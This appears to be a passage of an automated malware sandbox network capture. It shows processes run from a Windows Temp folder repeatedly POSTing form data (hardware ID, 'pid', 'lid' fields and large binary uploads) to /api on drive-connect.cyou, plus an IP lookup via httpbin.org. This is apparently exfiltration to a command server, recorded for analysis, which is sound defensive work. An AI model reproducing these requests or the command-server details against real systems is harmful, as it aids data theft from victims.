                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 76 6b 43 58 6d 6f 72 5a 56 54 45 34 37 77 71 78 4a 37 33 66 44 6c 42 7a 69 48 61 62 5a 62 66 41 4e 74 62 2f 46 6d 6f 6d 42 2f 74 47 6a 47 76 4f 31 70 52 6f 4a 5a 53 71 42 73 77 6e 78 64 35 75 55 58 50 45 4c 70 75 59 2f 72 31 33 78 38 59 62 62 68 73 2b 6c 67 37 77 4f 39 37 4f 6c 45 54 42 42 41 4e 4f 72 56 2b 74 31 76 4e 6b 41 74 46 44 6c 35 48 6a 4a 49 35 76 74 6a 4d 71 47 67 34 71 57 6f 77 54 4b 6d 35 46 48 43 57 39 76 35 36 39 52 36 33 66 44 6c 42 7a 69 48 61 62 5a 62 66 41 4e 74 62 32 6e 33 59 6a 4e 35 6f 37 67 45 62 53 7a 35 67 35 64 4d 57 33 54 37 42 2b 6f 63 49 37 47 46 71 52 47 38 50 63 34 79 53 4f 62 37 59 7a 4b 68 6f 4f 58 6e 4b 6f 65 34 61 61 32 55 54 42 42 41 4e 4f 72 56 2b 74 31 71 4f 35 47 6b 31 50 6c 39 48 48 77 58 66 69 2f 6b 35 72 64 67 59
                                                                                                                                                                                              Data Ascii: vkCXmorZVTE47wqxJ73fDlBziHabZbfANtb/FmomB/tGjGvO1pRoJZSqBswnxd5uUXPELpuY/r13x8Ybbhs+lg7wO97OlETBBANOrV+t1vNkAtFDl5HjJI5vtjMqGg4qWowTKm5FHCW9v569R63fDlBziHabZbfANtb2n3YjN5o7gEbSz5g5dMW3T7B+ocI7GFqRG8Pc4ySOb7YzKhoOXnKoe4aa2UTBBANOrV+t1qO5Gk1Pl9HHwXfi/k5rdgY


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.449878104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:53 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=UHD47JNECTF0DSQC
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 18150
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:01:53 UTC15331OUTData Raw: 2d 2d 55 48 44 34 37 4a 4e 45 43 54 46 30 44 53 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 55 48 44 34 37 4a 4e 45 43 54 46 30 44 53 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 48 44 34 37 4a 4e 45 43 54 46 30 44 53 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 55 48 44
                                                                                                                                                                                              Data Ascii: --UHD47JNECTF0DSQCContent-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--UHD47JNECTF0DSQCContent-Disposition: form-data; name="pid"2--UHD47JNECTF0DSQCContent-Disposition: form-data; name="lid"FATE99--test--UHD
                                                                                                                                                                                              2024-12-16 00:01:53 UTC2819OUTData Raw: 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21
                                                                                                                                                                                              Data Ascii: h/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!
                                                                                                                                                                                              2024-12-16 00:01:54 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:54 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=e27l939ec6165f3et7f1fcdhmt; expires=Thu, 10-Apr-2025 17:48:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gz9TxsPu9xOZdY8We2YZW6bOSP8zqxjAc4JECqLqOrpgFKJG76OeqIgndWyAt8IfJ7hclpJhnyujKQS%2B661yr8toF80XzQfLvkhtjZt9wL8lNQCWlH7O93xdFyqAQqq8KXgqCIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a66c42a3e0f95-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1540&rtt_var=581&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19112&delivery_rate=1879021&cwnd=169&unsent_bytes=0&cid=17c7bf153206e6bf&ts=1101&x=0"
                                                                                                                                                                                              2024-12-16 00:01:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2024-12-16 00:01:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449895104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:00 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=R2X84ROL5
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8729
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:02:00 UTC8729OUTData Raw: 2d 2d 52 32 58 38 34 52 4f 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 52 32 58 38 34 52 4f 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 32 58 38 34 52 4f 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 52 32 58 38 34 52 4f 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                              Data Ascii: --R2X84ROL5Content-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--R2X84ROL5Content-Disposition: form-data; name="pid"2--R2X84ROL5Content-Disposition: form-data; name="lid"FATE99--test--R2X84ROL5Content-Dispo
                                                                                                                                                                                              2024-12-16 00:02:01 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:01 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=4relor3deth75qm6b6ocduhgfq; expires=Thu, 10-Apr-2025 17:48:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhBGPUf7gkjmvDxhelHWXsiEOal6dA8zdUmTxa8FlXfaEe4dvFqGd%2BHSJeQtuAAH6rsY1wIhDKotdEw3M2JLptGnoKfcbP7wjv32Qdy%2BTSGKR2iJ0O7UwvIOOPvZOQsbwXkkhhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a66f0db11431c-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1759&rtt_var=659&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9661&delivery_rate=1660034&cwnd=237&unsent_bytes=0&cid=8ed6664119ad7c4f&ts=1201&x=0"
                                                                                                                                                                                              2024-12-16 00:02:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2024-12-16 00:02:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.449907104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:06 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=0B1Z4GPHUWWQL18M
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 20424
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:02:06 UTC15331OUTData Raw: 2d 2d 30 42 31 5a 34 47 50 48 55 57 57 51 4c 31 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 30 42 31 5a 34 47 50 48 55 57 57 51 4c 31 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 42 31 5a 34 47 50 48 55 57 57 51 4c 31 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 30 42 31
                                                                                                                                                                                              Data Ascii: --0B1Z4GPHUWWQL18MContent-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--0B1Z4GPHUWWQL18MContent-Disposition: form-data; name="pid"3--0B1Z4GPHUWWQL18MContent-Disposition: form-data; name="lid"FATE99--test--0B1
                                                                                                                                                                                              2024-12-16 00:02:06 UTC5093OUTData Raw: 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                              2024-12-16 00:02:07 UTC1031INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:07 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=qufimoh7kgn1e4tq2nohhdub08; expires=Thu, 10-Apr-2025 17:48:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFTcgRBFMM72GLZpZAZeEDzfWYm5GGOQl3SLKZuQSgPXI99pZ%2F%2FCpeJHn%2Fz2QLxMX8qbaYCFeJ%2BVgbO5dJDiA7pTDqRR3%2BATRLmJeeGEynjFJzzjb9HkEebA3%2Fz%2FqUbQ%2F%2BZuHW0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a6715fefa0f83-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=18&recv=27&lost=0&retrans=1&sent_bytes=4232&recv_bytes=21386&delivery_rate=138513&cwnd=230&unsent_bytes=0&cid=20dbcde0abd8a06f&ts=1379&x=0"
                                                                                                                                                                                              2024-12-16 00:02:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2024-12-16 00:02:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              9192.168.2.44991334.226.108.1554431104C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:07 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                              Host: httpbin.org
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              2024-12-16 00:02:08 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:07 GMT
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Server: gunicorn/19.9.0
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              2024-12-16 00:02:08 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                              Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              10192.168.2.449920104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:09 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=SQ46N4FHX
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 1281
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:02:09 UTC1281OUTData Raw: 2d 2d 53 51 34 36 4e 34 46 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 53 51 34 36 4e 34 46 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 51 34 36 4e 34 46 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 53 51 34 36 4e 34 46 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                              Data Ascii: --SQ46N4FHXContent-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--SQ46N4FHXContent-Disposition: form-data; name="pid"1--SQ46N4FHXContent-Disposition: form-data; name="lid"FATE99--test--SQ46N4FHXContent-Dispo
                                                                                                                                                                                              2024-12-16 00:02:10 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:10 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=6ktlud34jshvus6ee1nsflu8dj; expires=Thu, 10-Apr-2025 17:48:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aaF4mFhOEmG07hBzDWw3DAMAUI03SrN%2Ff2%2By8PZi1bm4rDVRCAMbtX94cc2ZEc0e3gHwpLc1OtwxQO9OZYU56Q%2FE1UC2%2By3tnpv1wnxqSNp3a3hFN3dzqqqRUiuvoP4U1eoE8bk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a672c583e80d0-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1805&rtt_var=695&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2191&delivery_rate=1617728&cwnd=208&unsent_bytes=0&cid=5f44ebf2eb8c2f08&ts=839&x=0"
                                                                                                                                                                                              2024-12-16 00:02:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2024-12-16 00:02:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              11192.168.2.449939104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:16 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=WE5MSLXXG6N
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 552125
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: 2d 2d 57 45 35 4d 53 4c 58 58 47 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 57 45 35 4d 53 4c 58 58 47 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 45 35 4d 53 4c 58 58 47 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 45 35 4d 53 4c 58 58 47 36 4e 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                              Data Ascii: --WE5MSLXXG6NContent-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--WE5MSLXXG6NContent-Disposition: form-data; name="pid"1--WE5MSLXXG6NContent-Disposition: form-data; name="lid"FATE99--test--WE5MSLXXG6NConte
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: c3 77 c4 82 1f 65 2b 37 dc fc b8 6f 00 25 26 43 cb be b9 d9 27 57 54 b9 71 a1 8d 7d e6 22 d9 1b 7f 45 44 5f 8a c9 1e 79 bd 99 73 7f c0 e0 16 15 17 af 6a 5b f8 11 77 4c 2f bb d1 5f 1d 7c be cf 0c 79 a9 5e ab 26 1d c1 b7 71 db fc 39 68 df 14 ce ea 86 a8 87 c2 63 79 c1 3d 1e 9d 43 2d c6 04 8c 5c 29 62 88 4c 2d c2 fd 95 b2 db 30 f9 63 14 1b 24 89 0c 05 8c cd 91 b7 49 b1 71 85 e5 e8 bd e0 cf b0 9e b7 ab f3 bd cc 01 fc cb d7 ed d7 37 f7 09 6f 45 bb 4b 8d e7 7a b1 fd 50 3b c0 59 23 bd 81 b0 73 75 12 69 e2 72 51 0c a2 40 4a e4 d2 dc 83 b1 11 b2 62 2c 1c 1e cd bc 13 e8 28 09 93 1f 92 e7 46 8d df 8f b2 e2 05 92 b3 3e 38 24 7d f2 23 48 a2 9e 0b 93 b6 ab d4 cf 96 10 00 32 4c 16 36 cb 19 ec 7a e3 84 8d eb 32 94 3f 21 0a ef d8 90 cf 43 d9 ee dd 31 b0 9f d4 a4 08 42 31
                                                                                                                                                                                              Data Ascii: we+7o%&C'WTq}"ED_ysj[wL/_|y^&q9hcy=C-\)bL-0c$Iq7oEKzP;Y#suirQ@Jb,(F>8$}#H2L6z2?!C1B1
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: a5 22 b7 a8 c0 b3 80 5c eb 20 b2 dc 8b a3 1b 1d b4 55 ad 21 4a 7b 7d 7b dd 1a 4e e8 b1 5c d1 0b fe d4 78 8c 46 e0 71 d6 54 a7 5d 5b ed 1c 19 27 b9 25 df 8b 9d 67 a3 e4 35 57 bb 14 05 79 33 2c b5 55 0a a6 54 7b 73 5c a6 e1 dc c6 f9 c0 dc b2 6b 95 bc cf 05 ab 9a 33 87 e1 e8 8b bf 7f 5b 61 3a f2 42 2a 9b 44 8f 76 2e 5c 5b 3f 1e 52 2f aa f7 b8 db 99 19 1e d2 7f 4d 60 52 cd ab e1 7f 8a b9 95 12 20 02 0a df 7e ef 9e d8 ae 5d 78 ac 3d d3 c7 29 e4 eb cd 9d 21 5c 5e 7d 56 56 1a 63 c1 d8 32 ba d0 cf 76 72 32 e9 af ca c9 fa 8a 20 96 74 cf c1 d6 32 d1 e6 a3 21 52 c3 25 dd 19 2d 9d 81 99 ac 6c 68 d3 49 bf de 32 42 3e 6b 89 71 68 b5 7a af e9 b4 d5 fb 56 aa 8c 34 6d 28 d4 b5 f0 fe 5c 88 3f 1a b8 a5 07 66 c6 fa 30 15 d0 e3 6e 88 bf a7 1a 29 87 89 63 d3 df 5f f4 49 c0 2a
                                                                                                                                                                                              Data Ascii: "\ U!J{}{N\xFqT]['%g5Wy3,UT{s\k3[a:B*Dv.\[?R/M`R ~]x=)!\^}VVc2vr2 t2!R%-lhI2B>kqhzV4m(\?f0n)c_I*
